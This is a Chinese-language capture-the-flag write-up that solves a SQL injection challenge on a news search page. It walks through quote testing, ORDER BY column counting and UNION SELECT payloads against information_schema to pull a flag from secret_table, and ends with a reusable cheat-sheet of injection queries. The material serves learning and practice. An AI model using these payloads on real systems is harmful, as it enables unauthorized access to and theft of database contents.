题目信息

分析过程

题目打开是有个输入框可以用来输入搜索信息，初步判断是个sql注入的题目。接下来判断能否进行sql注入：
输入 hi，有搜索结果，如下图:
输入hi’,无结果，如下图：
初步判定是hi‘后面还有单引号，导致重复输入导致的，（单引号与服务端代码中的’形成闭合，将我们输入的字符串hello包裹，服务端代码后面多出来一个‘导致语法错误，而加入#将后面的’注释掉之后不会报错，可确定为字符型SQL注入。）为了证明判断结果，输入hi’#(意思#后面的内容都要呗注释掉)，结果如下图：
证明确实存在sql注入的问题，解题思路为朝着sql注入的方向努力。

解题过程

1. 判断字段的个数：使用order by 确定。原理：order by根据前面查询内容的属性对查询数据进行分类,order by 后面的内容可以少于前面查询的属性数，但是不能多于查询的属性数
   hi’ order by 1#:
   hi’ order by 2#
   hi’ order by 3#
   hi’ order by 4#

证明是三个字段。
2. 使用union联合表法注入。
输入hi’ union select 1,2,3#:
只有2，3列回显，ps:
输入：

hi' union select 1,#
hi' union select 1,2#
hi' union select 2,3#

都无法正常回显。

3. 使用

hi' union select 1,database(),version()#

查询数据库版本和名称

可以看到数据库名称是news,数据库版本是5.5.61。版本是5.0版本以上，我们可以通过系统的数据库来获取很多想要的信息。
其中，database()的位置可以是任意的：（只要不是1就行，因为1不回显）

4.获取表名

结果如下：

或者

hi' union select 1,2,table_name from information_schema.tables where table_schema='news'#

结果如下：
得到表名news、secret_table
5. 获取字段名：

hi' union select 1,2,column_name from information_schema.columns where table_name='secret_table' #

结果如下：
得到字段名id、fl4g；需要获得fl4g的字段内容
6. 获得fl4g的字段内容,输入：

hi' union select 1,id,fl4g from news.secret_table #

获得flag：

相关知识

1. 5.0以上的版本自带information_schema数据库，这数据库下面又有schemata、tables、columns，这些表中又有(schema_name)、(table_name、table_schema)、(table_schema、table_name、column_name)字段。
   2. 使用或者不使用group_concat都可以，相关用法如下：https://www.jb51.net/article/2844934ju.htm
   3.总结：
   查表：hi’ union select 回显字段1,回显字段2,group_concat(table_name) from information_schema.tables where table_schema=‘news’，在三个回显字段中选一个就行。
   查列：hi’ union select 回显字段1,回显字段2,group_concat(column_name) from information_schema.columns where table_schema=‘news’ #看表中有哪些列，也就是表含有哪些信息。
   查字段：hi’ union select 回显字段1,回显字段2,fl4g from secret_table#，就是把表中的列里的具体数字搞出来。